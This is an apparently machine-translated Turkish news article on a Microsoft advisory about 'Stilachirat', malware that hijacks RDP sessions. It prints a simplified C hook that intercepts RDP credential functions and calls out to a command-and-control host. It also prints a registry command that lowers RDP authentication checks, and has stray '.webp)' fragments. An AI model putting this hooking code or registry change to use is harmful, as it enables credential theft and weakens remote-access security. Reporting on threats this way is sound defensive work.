Microsoft, Stilachirat adlı yeni keşfedilen kötü amaçlı yazılım suşu ile ilgili olarak, uzak masaüstü protokolü (RDP) oturumlarından verileri özellikle hedefleyen ve peçelesine yönlendiren acil bir güvenlik danışmanlığı yayınladı.
Sofistike kötü amaçlı yazılımlar, finansal kurumlara, devlet kurumlarına ve birçok bölgedeki kritik altyapı kuruluşlarına yönelik hedefli saldırılarda gözlemlenmiştir.
Güvenlik uzmanları, bu yeni tehdidin kimlik bilgilerini, tuş vuruşlarını ve hatta devam eden RDP oturumlarını algılamadan kaçırmak için gelişmiş yeteneklere sahip olduğu konusunda uyarıyor.
İlk enfeksiyon tipik olarak kötü niyetli ekler içeren kimlik avı e -postaları veya istismar kitlerine hizmet veren güvenliği ihlal edilmiş web siteleri aracılığıyla gerçekleşir.
Bir kurbanın sisteminde yürütüldüğünde, Stilachirat, güvenlik çözümleri tarafından fark edilmemesini sağlamak için sistem başlatılmasında çalışan ve kayıt defteri anahtarlarını değiştiren planlanmış bir görev oluşturarak kalıcılık oluşturur.
Microsoft Güvenlik Araştırmacıları, çalıntı verileri yaymak için şifreli DNS tünelleme ve HTTPS geri arama kombinasyonunu kullanan kötü amaçlı yazılımların kendine özgü komut ve kontrol altyapısını belirledi.
Enfekte sistemlerin analizi, Stilachirat’ın sanal makine algılama ve hata ayıklayıcı kaçırma yetenekleri dahil olmak üzere sofistike anti-analiz teknikleri kullandığını ortaya koydu.
Kötü amaçlı yazılımların birincil işlevi, Windows uzak masaüstü hizmetleri API’sına takarak RDP oturum verilerini ele geçirmeye odaklanır.
Bu, giriş bilgilerini yakalamasını, oturum faaliyetlerini izlemesini ve hatta saldırganlar tarafından daha sonra gözden geçirilmek üzere tüm uzak oturumları kaydetmesini sağlar.
Stilachirat’ı özellikle tehlikeli kılan şey, meşru kullanıcı bağlantılarını bozmadan sessizce çalışma yeteneğidir.
RDP’yi sık sık kullanan uzak çalışanları veya yöneticileri olan kuruluşlar, tehlikeye atılan oturumlar ağlarda yanal harekete, veri hırsızlığına ve potansiyel fidye yazılımı dağıtımına yol açabileceğinden bu tehditten önemli risklerle karşı karşıyadır.
Teknik analiz ve azaltma
Stilachirat’ın RDP oturumu kaçırma işlevselliğinin çekirdeği API Hooking adlı bir teknikle uygulanır.
Kötü amaçlı yazılım kendisini MSTSC.EXE işlemine enjekte eder ve kimlik bilgisi taşıma ve şifreleme ile ilgili işlevleri keser.
Aşağıda, kötü amaçlı yazılımlarda bulunan kanca uygulamasının basitleştirilmiş bir temsili:-
BOOL APIENTRY DllMain(HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved) {
switch (ul_reason_for_call) {
case DLL_PROCESS_ATTACH:
// Hook RDP-related APIs
HookFunction("mstscax.dll", "CredentialsCacheInitialize",
(PVOID)HookedCredentialsCacheInitialize);
HookFunction("mstscax.dll", "EncryptCredentials",
(PVOID)HookedEncryptCredentials);
// Set up exfiltration channel
InitializeC2Communication("c2.stilachi-server.net", 8443);
break;
}
return TRUE;
}.webp)
Enfekte sistemleri analiz ederken Microsoft, stilachirat varlığını gösteren ayırt edici bir kayıt defteri değişikliği keşfetti:
REG ADD "HKCU\Software\Microsoft\Terminal Server Client\Default" /v "AuthenticationLevelOverride" /t REG_DWORD /d "0" /f.webp)
Microsoft, kuruluşların RDP bağlantıları için çok faktörlü kimlik doğrulama uygulamasını, RDP’nin güvenilir ağlara erişimini kısıtlamasını, sistemleri tamamen yamalı tutmasını ve API kanca tekniklerini tanımlayabilen uç nokta algılama ve yanıt çözümlerini dağıtmasını önerir.
Ek olarak, olağandışı RDP bağlantı modellerinin izlenmesi ve ağ segmentasyonunun uygulanması, potansiyel uzlaşmaların etkisini sınırlamaya yardımcı olabilir.
Are you from SOC/DFIR Teams? – Analyse Malware Incidents & get live Access with ANY.RUN -> Start Now for Free.